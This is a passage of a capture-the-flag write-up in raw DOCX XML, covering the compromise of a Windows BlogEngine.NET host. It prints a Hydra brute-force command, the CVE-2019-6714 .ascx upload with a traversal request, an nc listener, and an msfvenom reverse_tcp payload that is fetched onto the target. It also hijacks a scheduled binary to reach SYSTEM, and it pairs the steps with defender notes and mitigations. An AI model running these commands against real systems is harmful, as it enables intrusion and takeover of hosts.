        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Credential Brute-Forcing with Hydra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because the login form accepted arbitrary attempts with no visible lockout or rate-limiting, it was vulnerable to an online brute-force / password-spraying attack. Hydra's http-post-form module was used, targeting the known 'admin' username with the rockyou.txt wordlist:</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hydra -l admin -P /usr/share/wordlists/rockyou.txt &lt;TARGET_IP&gt; http-post-form \
  "/account/login.aspx:__VIEWSTATE=&lt;value&gt;&amp;__EVENTVALIDATION=&lt;value&gt;&amp;UserName=^USER^&amp;Password=^PASS^&amp;Log+in=Log+in:F=Login Failed"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key details that make this command work:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">^USER^ and ^PASS^ are Hydra placeholders — Hydra substitutes each candidate username/password from the wordlist into these positions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The static __VIEWSTATE and __EVENTVALIDATION values captured from Burp must be included, otherwise ASP.NET rejects the POST before Hydra's credentials are even evaluated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F=&lt;string&gt; tells Hydra which text in the HTTP response indicates a FAILED login attempt, so it can distinguish success from failure automatically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack recovered a valid admin password. Logging in with this credential granted access to the BlogEngine.NET administration dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker vs. Defender note: this stage highlights why account lockout policies, CAPTCHAs, and rate-limiting on authentication endpoints are critical. A form that never locks an account after failed attempts turns any weak or reused password into a guaranteed compromise given enough time and a good wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Initial Access — BlogEngine.NET RCE (CVE-2019-6714)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With admin access, the dashboard's About/version page revealed the exact BlogEngine.NET build in use. Searching Exploit-DB for that version surfaced a known Directory Traversal / Remote Code Execution vulnerability, tracked as CVE-2019-6714.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability allows an authenticated admin user to upload a malicious ASP.NET user control (.ascx file, e.g. PostView.ascx) disguised as a blog post attachment through the built-in File Manager, then trigger it directly by requesting a crafted theme path — because BlogEngine.NET does not properly validate file type or restrict execution from the themes/content directory:</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GET /?theme=../../App_Data/files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation steps performed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Downloaded the public PoC exploit script and reviewed its source code before use — a mandatory safety practice, since any downloaded exploit could itself contain malicious payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Edited the script to set the attacker's IP and listening port for the reverse shell callback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logged into the BlogEngine.NET admin panel, opened an existing post, and used the File Manager to upload the crafted PostView.ascx file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Started a Netcat listener on the attack box: nc -lvnp &lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Triggered the payload by requesting the theme path above, which caused the server to execute the malicious control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The listener caught a reverse shell running in the context of the IIS application pool identity (iis apppool\blog) — a low-privileged service account, confirmed with the whoami command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker vs. Defender note: this step is a textbook example of why patch management for third-party CMS/plugins matters as much as patching the OS. BlogEngine.NET's file manager plus an outdated version equals unauthenticated-adjacent RCE for anyone with (even low-privileged) admin credentials. Defenders should keep an inventory of installed web software versions and subscribe to CVE feeds for each one in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Shell Stabilisation — Upgrading to Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The raw Netcat shell was unstable, so it was upgraded to a full Meterpreter session for easier post-exploitation. The workflow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated a Windows executable payload with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;ATTACKER_IP&gt; LPORT=&lt;PORT&gt; -f exe -o rev.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hosted the payload with a simple Python web server: python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the existing Netcat shell, used PowerShell's Invoke-WebRequest (or wget) to download rev.exe onto the target, e.g. into C:\Windows\Temp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Started a Metasploit multi/handler configured with the matching payload, LHOST, and LPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executed rev.exe on the target, which connected back and opened a full Meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From inside Meterpreter, the sysinfo command confirmed the exact Windows build/version of the host — information later fed into further enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 Privilege Escalation — Scheduled Task / Binary Hijack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With a stable session, the next objective was escalating from the low-privileged service account to Administrator/SYSTEM. Meterpreter's post/windows/gather/enum_services module (and separately, WinPEAS) was used to enumerate running services and scheduled tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumeration revealed an abnormal, non-default service with a path pointing outside the usual Program Files locations. Investigating that directory uncovered an events/log file confirming that a scheduled task was periodically re-launching a binary named Message.exe — roughly every 20–30 seconds — as a privileged (Administrator-level) context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a classic insecure-permissions privilege escalation vector: if a low-privileged account has write access to a binary (or its containing folder) that a higher-privileged scheduled task or service executes, an attacker can simply replace that binary with a malicious payload and wait for the scheduler to run it with elevated rights.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backed up the original legitimate file first (e.g. renaming it to Message.exe.bak / Message.txt) so the technique's behaviour could be understood and the change reversed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated a new malicious Message.exe payload with msfvenom, matching the same reverse-shell/Meterpreter payload approach used earlier, with a fresh LPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Started a second Metasploit multi/handler listener for the new callback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transferred the malicious Message.exe onto the target (via the existing Meterpreter session's upload command or a PowerShell download) into the same directory as the original</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Waited for the scheduled task to trigger — the malicious binary executed with SYSTEM-level privileges and connected back to the new listener</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the new session connected, Meterpreter's getsystem command was used (as a convenience/verification step) and whoami confirmed the session was now running as NT AUTHORITY\SYSTEM — full administrative control of the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker vs. Defender note: this vulnerability class (unquoted service paths, weak folder/file ACLs on binaries executed by privileged schedulers, or services running as SYSTEM that point to user-writable locations) is one of the most common real-world Windows privilege-escalation techniques. Defenders should audit file/folder permissions on anything referenced by a scheduled task or service that runs with elevated privileges, and apply the principle of least privilege consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7 Alternative Path — Manual Enumeration without Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The room also demonstrates achieving the same result using more "living-off-the-land" techniques, avoiding Metasploit almost entirely:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate a simple reverse shell payload (rather than a full Meterpreter stager) with msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use PowerShell's built-in download cradle to pull both the reverse-shell payload and the WinPEAS.bat/.exe enumeration script onto the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run WinPEAS directly from a plain reverse shell to enumerate misconfigurations, weak permissions, stored credentials, and other escalation vectors, without ever touching Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm host details (e.g. original install date, patch level) with the built-in systeminfo command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This approach is stealthier and more representative of real-world engagements, since heavy use of Metasploit's Meterpreter payloads is far more likely to be flagged by modern EDR/antivirus solutions than simple, native Windows commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Flags Captured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F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">user.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Users\Jeff\Desktop\user.txt (retrieved with standard low-privileged access after initial foothold)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6950"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Users\Administrator\Desktop\root.txt (retrieved after privilege escalation to SYSTEM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap scan identifies HTTP (80), RDP (3389), and WinRM (5985) on a Windows/IIS host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual browsing finds a BlogEngine.NET admin login form submitting via HTTP POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp Suite captures __VIEWSTATE / __EVENTVALIDATION values required for a valid POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra brute-forces the admin password using the http-post-form module and rockyou.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Admin login reveals the BlogEngine.NET version, vulnerable to CVE-2019-6714.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A malicious .ascx control is uploaded and triggered, yielding a reverse shell as a low-privileged IIS service account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The shell is upgraded to Meterpreter via msfvenom + multi/handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service/scheduled-task enumeration (WinPEAS / enum_services) reveals a writable Message.exe re-executed on a schedule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Message.exe is replaced with a malicious payload; the scheduler executes it as SYSTEM, completing full privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Recommendations for Defenders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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Weakness Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5550"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommended Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Unrestricted login attempts on the admin portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5550"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement account lockout, CAPTCHA, and rate-limiting / WAF rules on authentication endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Outdated BlogEngine.NET version vulnerable to RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5550"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch or upgrade third-party CMS software promptly; track CVEs for all installed components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin File Manager allows upload of executable .ascx controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5550"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
